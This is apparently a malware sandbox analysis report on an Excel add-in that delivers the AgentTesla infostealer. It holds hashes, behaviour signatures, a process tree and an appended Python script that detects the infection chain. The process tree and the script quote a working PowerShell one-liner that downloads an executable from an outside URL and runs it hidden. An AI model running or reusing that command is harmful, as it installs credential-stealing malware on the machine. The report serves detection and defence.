Analysis

max time kernel: 147s
max time network: 25s
platform: windows7_x64
resource: win7v200430
submitted: 09-07-2020 04:22

Static task: static1

Behavioral task: behavioral1
  Sample: 16015107.xlam
  Resource: win7v200430

Behavioral task: behavioral2
  Sample: 16015107.xlam
  Resource: win10
General

Target: 16015107.xlam
Size: 12KB
MD5: db3b7d4cfb134c5ad4c74891e23c06e4
SHA1: b78856ac0597b12d2befe6ebb055082632529a71
SHA256: 2e6f88c4dc2322c385d506a81b5127f4361cb824389315d4dbb100e959c8fbc0
SHA512: 2266ab432712b2a9d4a744bcf0ac852e5573a00fe114c5378bd1e8a87355a6038efc32c38738ea7edb64eb8236458dbfdbc4cadfa84ccef196c20a8f0b153a00
Malware Config

Extracted: http://shopcart.indbytes.com/cig/16015107.jpg
  This is the URL the PowerShell stage fetches. Despite the .jpg extension the content is written to %TEMP%\fdhe.exe and executed (see the command line in the process tree), so treat it as the download URL of the second-stage executable, not as an image.
Signatures

Blacklisted process makes network request (1 IoC)
  flow 4: powershell.exe (PID 324)

Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, PID 324, powershell.exe
  Token: SeDebugPrivilege, PID 1228, fdhe.exe

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

AgentTesla
  Agent Tesla is a .NET-based remote access tool (RAT) and information stealer written in Visual Basic (.NET). The browser, FTP-client and email-client reads listed in this report are consistent with its credential-harvesting behaviour.

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  PID 904, EXCEL.EXE

Suspicious use of SetWindowsHookEx (5 IoCs)
  PID 904, EXCEL.EXE (5 times)

Executes dropped EXE (1 IoC)
  PID 1228, fdhe.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  PID 324, powershell.exe (2 times)
  PID 1228, fdhe.exe (2 times)

Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.

Office loads VBA resources, possible macro or embedded object present
  The sample is an .xlam (Excel macro-enabled add-in); the VBA load is consistent with an auto-run macro firing when Excel opens it.

Suspicious use of FindShellTrayWindow (2 IoCs)
  PID 904, EXCEL.EXE (2 times)

Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (PID 904) is not expected to spawn this process: cmd.exe (PID 240)

Suspicious use of WriteProcessMemory (10 IoCs)
  PID 904 (EXCEL.EXE) wrote to memory of PID 240 (cmd.exe) (3 times)
  PID 240 (cmd.exe) wrote to memory of PID 324 (powershell.exe) (3 times)
  PID 324 (powershell.exe) wrote to memory of PID 1228 (fdhe.exe) (4 times)
  Each pair here is a parent and the child it has just created, so these writes line up with process creation rather than injection into an unrelated process; the signal is the chain itself (Excel -> cmd.exe -> PowerShell -> dropped EXE).
Processes

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (PID 904)
  Command line: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\16015107.xlam
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  The /dde switch is how the Windows file association normally launches Excel for a document and is not by itself evidence of DDE abuse; the add-in's VBA is the likely launcher of the child below.

  C:\Windows\System32\cmd.exe (PID 240, child of 904)
    Command line: "C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/16015107.jpg',$env:Temp+'\fdhe.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\fdhe.exe')
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 324, child of 240)
      Command line: powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/16015107.jpg',$env:Temp+'\fdhe.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\fdhe.exe')
      - Blacklisted process makes network request
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      The one-liner bypasses the execution policy, hides its window, downloads the payload from a URL with a .jpg extension, writes it to %TEMP%\fdhe.exe and launches it through the Shell.Application COM object instead of Start-Process.

      C:\Users\Admin\AppData\Local\Temp\fdhe.exe (PID 1228, child of 324)
        Command line: "C:\Users\Admin\AppData\Local\Temp\fdhe.exe"
        - Suspicious use of AdjustPrivilegeToken
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
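Detection logic for the chain in this process tree (the "Process spawned unexpected child process" signature and the PowerShell download cradle), as an added example that is not code from the sandbox vendor or from this report. The events are constructed from the report's own process tree (PIDs 904, 240, 324, 1228) in the shape of Sysmon Event ID 1 process-creation records; the field set, the Sysmon framing and the rule names are assumptions.

```python
"""Detection of the Excel -> cmd.exe -> PowerShell -> dropped EXE chain above.

Added example for this report, not code from the sandbox vendor or the malware.
SAMPLE_EVENTS below are constructed from the report's process tree in the shape
of Sysmon Event ID 1 records; the field set and rule names are assumptions.
"""
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
CRADLE_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|Net\.WebClient|Start-BitsTransfer", re.I)
URL_RE = re.compile(r"https?://[^\s'\"),;]+", re.I)
# quoted '\name.exe' fragments such as $env:Temp+'\fdhe.exe' in the report
EXE_LITERAL_RE = re.compile(r"'(\\[^']*?\.exe)'", re.I)
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # its command line


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def extract_iocs(cmdline: str) -> dict:
    """Pull download URLs and quoted drop-file names out of a one-liner."""
    return {"urls": URL_RE.findall(cmdline),
            "drop_names": [m.lstrip("\\") for m in EXE_LITERAL_RE.findall(cmdline)]}


def analyze(events) -> list:
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = basename(e.image)
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""

        # 1. Office host spawning a shell / script host (macro, DDE or exploit).
        if pimg in OFFICE_IMAGES and img in SCRIPT_HOSTS:
            findings.append(Finding(e.pid, "office_spawns_script_host", f"{pimg} -> {img}"))

        # 2. PowerShell showing at least two download-cradle traits at once.
        if img in ("powershell.exe", "pwsh.exe"):
            hits = []
            if re.search(r"-ex(?:ecutionpolicy)?\s+bypass", e.cmdline, re.I):
                hits.append("ExecutionPolicy Bypass")
            if re.search(r"-w(?:indowstyle)?\s+hidden", e.cmdline, re.I):
                hits.append("hidden window")
            if CRADLE_RE.search(e.cmdline):
                hits.append("download cradle")
            if len(hits) >= 2:
                findings.append(Finding(e.pid, "powershell_download_cradle", ", ".join(hits)))

        # 3. A URL ending in an image extension whose content is saved as an .exe.
        iocs = extract_iocs(e.cmdline)
        for url in iocs["urls"]:
            if url.lower().endswith(IMAGE_EXTS) and iocs["drop_names"]:
                findings.append(Finding(e.pid, "image_url_dropped_as_exe",
                                        f"{url} -> {iocs['drop_names'][0]}"))

        # 4. A script host launching an .exe out of the user's Temp directory.
        if pimg in SCRIPT_HOSTS and "\\appdata\\local\\temp\\" in e.image.lower() \
                and img.endswith(".exe"):
            findings.append(Finding(e.pid, "temp_exe_spawned_by_script_host",
                                    f"{pimg} -> {e.image}"))
    return findings


PS_CMD = ("(new-object System.Net.WebClient).DownloadFile("
          "'http://shopcart.indbytes.com/cig/16015107.jpg',$env:Temp+'\\fdhe.exe');"
          "(New-Object -com Shell.Application).ShellExecute($env:Temp+'\\fdhe.exe')")

# Constructed from the report's process tree (not raw sandbox output).
SAMPLE_EVENTS = [
    ProcEvent(904, 0, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde '
              r"C:\Users\Admin\AppData\Local\Temp\16015107.xlam"),
    ProcEvent(240, 904, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass '
              "-W Hidden -command " + PS_CMD),
    ProcEvent(324, 240, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -executionpolicy bypass -W Hidden -command " + PS_CMD),
    ProcEvent(1228, 324, r"C:\Users\Admin\AppData\Local\Temp\fdhe.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\fdhe.exe"'),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"PID {f.pid:>5}  {f.rule:<32} {f.detail}")
```

Rule 2 requires two traits together so that an administrator's plain `-ExecutionPolicy Bypass` script does not fire on its own; rule 3 is the cheap "image URL, .exe on disk" mismatch that this sample shows and that a proxy or EDR can check without sandboxing; rule 4 catches the dropped payload even when the cradle itself was obfuscated past the regexes. Excel's own `/dde` launch does not match anything, which is the intended behaviour.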